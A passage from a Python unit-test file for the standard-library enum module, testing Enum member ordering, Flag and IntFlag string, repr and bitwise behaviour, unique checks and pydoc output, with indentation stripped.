verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'Perm.R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'Perm.R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
